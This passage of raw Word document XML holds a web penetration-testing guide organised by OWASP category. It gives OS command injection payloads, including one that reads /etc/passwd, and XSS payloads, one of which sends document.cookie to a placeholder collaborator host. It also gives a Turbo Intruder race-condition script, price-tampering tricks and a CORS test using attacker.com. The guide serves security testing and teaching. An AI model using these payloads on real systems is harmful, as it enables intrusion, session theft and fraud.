          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Right-click request in Proxy History → Extensions → SQLiPy → Send to SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure SQLMap options in extension panel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Results populate in Burp output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ OS Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test in any parameter that may interact with the OS (ping, nslookup, file operations)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  127.0.0.1; id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  127.0.0.1 | whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  127.0.0.1 &amp;&amp; cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Blind: use Collaborator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  127.0.0.1; nslookup YOUR_COLLAB.burpcollaborator.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS: payload in URL/parameter reflected in HTML immediately</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS: payload persisted in database, served to all users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM-based XSS: payload processed by client-side JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00D4AA"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS Testing Payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;script&gt;alert(document.domain)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  javascript:alert(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;svg onload=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  '&gt;&lt;script&gt;fetch('https://COLLAB/'+document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Context-aware payloads — if inside attribute:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  " onmouseover="alert(1)</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CWE-89 (SQL Injection), CWE-78 (OS Command Injection), CWE-79 (XSS), CWE-94 (Code Injection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Examples: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2012-2122 (MySQL auth bypass), CVE-2014-7169 (Shellshock), CVE-2021-26855 (Exchange Server SSRF+RCE)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A04:2021 — Insecure Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure design encompasses flaws in business logic, missing security controls at the architecture level, and design decisions that inherently create risk. Unlike implementation bugs, these cannot be fixed by just patching code — they require redesign.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Business Logic Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Price manipulation: change price to 0.00 or negative in POST body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Quantity tampering: order 0 or -1 items to gain credits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Workflow bypass: skip payment step by jumping directly to order confirmation URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Race conditions: two requests to redeem same voucher simultaneously — use Turbo Intruder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Race Condition Attack with Turbo Intruder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Turbo Intruder script for simultaneous requests:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  def queueRequests(target, wordlists):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=20)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      for i in range(20):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">          engine.queue(target.req, target.baseInput)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      engine.openGate('race1')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Send 20 simultaneous requests to apply same promo code</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CWE-840 (Business Logic Errors), CWE-362 (Race Condition), CWE-372 (Incomplete Internal State)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A05:2021 — Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Security misconfiguration is the most common finding in web application pentests. It includes default credentials, unnecessary features enabled, overly permissive CORS, verbose error messages, missing security headers, and unpatched software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Testing Security Headers with Burp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Proxy History, examine every response for missing security headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Missing headers to flag: Strict-Transport-Security, Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ CORS Misconfiguration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # In Repeater, add Origin header with attacker domain:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /api/user/data HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Host: targetcorp.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Origin: https://attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Vulnerable response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Access-Control-Allow-Origin: https://attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Access-Control-Allow-Credentials: true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # This allows attacker.com to read authenticated API responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Directory Listing &amp; Backup Files</w:t>
